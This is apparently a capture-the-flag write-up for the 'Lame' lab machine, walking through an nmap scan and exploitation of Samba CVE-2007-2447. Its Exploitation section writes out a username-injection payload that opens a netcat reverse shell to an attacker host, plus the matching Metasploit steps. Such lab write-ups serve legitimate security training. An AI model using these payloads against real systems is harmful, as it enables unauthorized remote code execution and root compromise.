Lame

Summary

Lame is an easy-difficulty Linux machine that demonstrates common vulnerabilities found in outdated services. The box features a vulnerable Samba service that allows for remote code execution, leading to an initial foothold. Privilege escalation is straightforward as the exploit provides direct root access.

Reconnaissance

Nmap Scan

First, let’s start with a comprehensive nmap scan to identify open ports and services:

nmap -sC -sV -oA lame 10.10.10.3

Results:

Port 21/tcp - FTP (vsftpd 2.3.4)
Port 22/tcp - SSH (OpenSSH 4.7p1)
Port 139/tcp - NetBIOS
Port 445/tcp - Samba (3.0.20-Debian)

The Samba version 3.0.20 immediately stands out as potentially vulnerable.

Vulnerability Assessment

Samba 3.0.20 - Remote Code Execution

A quick search reveals that Samba 3.0.20 is vulnerable to CVE-2007-2447, which allows remote attackers to execute arbitrary commands via shell metacharacters in the username.

This vulnerability affects Samba versions 3.0.0 through 3.0.25rc3.

Exploitation

Method 1: Manual Exploitation

We can exploit this manually by crafting a malicious username:

smbclient //10.10.10.3/tmp -U "/=\`nohup nc -e /bin/sh 10.10.14.5 4444\`"

Set up a listener on your attacking machine:

nc -lvnp 4444

Method 2: Metasploit

Alternatively, we can use Metasploit’s exploit module:

msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
set LHOST 10.10.14.5
exploit

Success! We get a shell as root directly.

Post-Exploitation

Since the exploit provides root access immediately, we can simply retrieve both flags:

User Flag

cat /home/makis/user.txt

Root Flag

cat /root/root.txt

Lessons Learned

Keep Services Updated: Running outdated versions of critical services like Samba can lead to trivial exploitation
Input Validation: The vulnerability exists due to improper sanitization of username input
Principle of Least Privilege: Services should not run with root privileges unless absolutely necessary